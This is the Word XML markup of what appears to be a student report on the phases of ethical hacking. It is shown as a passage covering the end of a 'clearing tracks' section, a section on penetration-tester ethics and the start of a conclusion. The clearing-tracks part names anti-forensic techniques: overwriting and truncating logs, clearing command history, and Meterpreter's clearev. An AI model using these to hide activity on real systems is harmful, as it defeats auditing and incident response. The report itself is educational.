          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Fig.2</w:t>
      </w:r>
      <w:r w:rsidR="00F9068D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">9 Clearing </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F9068D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>tracks</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2AE2CB96" w14:textId="22F9C149" w:rsidR="007B3E5C" w:rsidRPr="00FA5B3B" w:rsidRDefault="008E1BBA" w:rsidP="00772C6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The hacker </w:t>
      </w:r>
      <w:r w:rsidR="00B90FD2" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>overwrites</w:t>
      </w:r>
      <w:r w:rsidR="00C514E0" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the log file instead of deleting them, </w:t>
      </w:r>
      <w:r w:rsidR="0043536C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">since a deleted log will cause </w:t>
      </w:r>
      <w:r w:rsidR="00DB200B" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">suspicion. </w:t>
      </w:r>
      <w:r w:rsidR="00CA4623" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>There are other</w:t>
      </w:r>
      <w:r w:rsidR="00086517" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> more</w:t>
      </w:r>
      <w:r w:rsidR="00CA4623" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> effective </w:t>
      </w:r>
      <w:r w:rsidR="00086517" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ways such as using trun</w:t>
      </w:r>
      <w:r w:rsidR="007C3008" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">cate and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007C3008" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>logrorate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B90FD2" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. The attack then </w:t>
      </w:r>
      <w:r w:rsidR="00B45A09" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>clears</w:t>
      </w:r>
      <w:r w:rsidR="00B90FD2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326BE9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">the command history and </w:t>
      </w:r>
      <w:r w:rsidR="007538DE" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>forcefully close</w:t>
      </w:r>
      <w:r w:rsidR="00B45A09" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="007538DE" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the session</w:t>
      </w:r>
      <w:r w:rsidR="00DB200B" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DF62DF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7B3E5C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>In Windows</w:t>
      </w:r>
      <w:r w:rsidR="00DF62DF" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> systems</w:t>
      </w:r>
      <w:r w:rsidR="007B3E5C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, the hacker can perform </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003B1E37" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>clearev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003B1E37" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> command in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003B1E37" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003B1E37" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C18C41" w14:textId="2130C394" w:rsidR="0019008D" w:rsidRPr="00FA5B3B" w:rsidRDefault="0019008D" w:rsidP="0019008D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FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="00DA2925" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Ethics of a penetration tester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75045C15" w14:textId="6B885B23" w:rsidR="006E0338" w:rsidRPr="00FA5B3B" w:rsidRDefault="0029772E" w:rsidP="00001D3E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>Ethical hacking requires</w:t>
      </w:r>
      <w:r w:rsidR="00260463" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> commitment to a high standard of ethical conducts and guidelines</w:t>
      </w:r>
      <w:r w:rsidR="00B570FF" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Penetration testers are to </w:t>
      </w:r>
      <w:r w:rsidR="000273D8" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">operate with permission to identify and address security </w:t>
      </w:r>
      <w:r w:rsidR="001872B7" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>vulnerabilities only within the defined scope</w:t>
      </w:r>
      <w:r w:rsidR="005865FC" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidR="00FD4B92" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>resolve ethical dilemma faced</w:t>
      </w:r>
      <w:r w:rsidR="002C0B4C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Appendix 4)</w:t>
      </w:r>
      <w:r w:rsidR="0077031D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001872B7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395FFE" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00320013" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>responsibility of</w:t>
      </w:r>
      <w:r w:rsidR="00113AA9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395FFE" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ethical hacker</w:t>
      </w:r>
      <w:r w:rsidR="00EF044F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00113AA9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> is to use</w:t>
      </w:r>
      <w:r w:rsidR="00EF044F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> their advanced technical skill</w:t>
      </w:r>
      <w:r w:rsidR="00522A87" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s and knowledge to strengthen security</w:t>
      </w:r>
      <w:r w:rsidR="00113AA9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4C386E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>defences, not to exploit and personal gain.</w:t>
      </w:r>
      <w:r w:rsidR="00066B3F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7937C1" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Crucial component of ethic including</w:t>
      </w:r>
      <w:r w:rsidR="00D21575" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> gaining proper</w:t>
      </w:r>
      <w:r w:rsidR="007937C1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D21575" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">authorization before </w:t>
      </w:r>
      <w:r w:rsidR="00B301DE" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">testing, </w:t>
      </w:r>
      <w:r w:rsidR="000219E5" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">reporting finding responsibly </w:t>
      </w:r>
      <w:r w:rsidR="00F16C23" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>and respect individuals</w:t>
      </w:r>
      <w:r w:rsidR="003814F7" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and organization</w:t>
      </w:r>
      <w:r w:rsidR="00F16C23" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> privacy</w:t>
      </w:r>
      <w:r w:rsidR="003814F7" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Information </w:t>
      </w:r>
      <w:r w:rsidR="00D92149" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cannot be disclose</w:t>
      </w:r>
      <w:r w:rsidR="002D2DBB" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00D92149" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to other</w:t>
      </w:r>
      <w:r w:rsidR="00CE33A8" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> party</w:t>
      </w:r>
      <w:r w:rsidR="00D92149" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and only</w:t>
      </w:r>
      <w:r w:rsidR="00F47B54" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> able to</w:t>
      </w:r>
      <w:r w:rsidR="00D92149" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> if </w:t>
      </w:r>
      <w:r w:rsidR="00F47B54" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>the org</w:t>
      </w:r>
      <w:r w:rsidR="000B15C9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>anization</w:t>
      </w:r>
      <w:r w:rsidR="00F47B54" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> authorized</w:t>
      </w:r>
      <w:r w:rsidR="00CE33A8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0B15C9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">the ethical hacker </w:t>
      </w:r>
      <w:r w:rsidR="000B15C9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>allows to.</w:t>
      </w:r>
      <w:r w:rsidR="002D2DBB" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C7070" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ethical hackers must operate</w:t>
      </w:r>
      <w:r w:rsidR="00BD77F3" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> strictly</w:t>
      </w:r>
      <w:r w:rsidR="004C7070" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> with</w:t>
      </w:r>
      <w:r w:rsidR="00BD77F3" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="004C7070" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00BD77F3" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>boundaries of laws and regulations</w:t>
      </w:r>
      <w:r w:rsidR="00C00471" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, promoting transparency and communication wi</w:t>
      </w:r>
      <w:r w:rsidR="00263B61" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">th the organization being tested. The </w:t>
      </w:r>
      <w:r w:rsidR="00104DFB" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>goal</w:t>
      </w:r>
      <w:r w:rsidR="00263B61" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> of ethical hackers </w:t>
      </w:r>
      <w:r w:rsidR="00B1051D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00263B61" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00222A8F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">contribute to security by preventing and defending against cyber threats while </w:t>
      </w:r>
      <w:r w:rsidR="00B1051D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>following the principles of integrity, professionalism, and respect for privacy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463246F5" w14:textId="4B8D120B" w:rsidR="0077316F" w:rsidRPr="00FA5B3B" w:rsidRDefault="0077316F" w:rsidP="0077316F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FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>4.Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F66053C" w14:textId="18C1F8C0" w:rsidR="0077316F" w:rsidRPr="00FA5B3B" w:rsidRDefault="0077316F" w:rsidP="0077316F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00BB619C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">report explores the 5 </w:t>
      </w:r>
      <w:r w:rsidR="00DD434A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>phases</w:t>
      </w:r>
      <w:r w:rsidR="00BB619C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> of ethical hacking through </w:t>
      </w:r>
      <w:r w:rsidR="00B4768A" w:rsidRPr="00FA5B3B">
        <w:rPr>
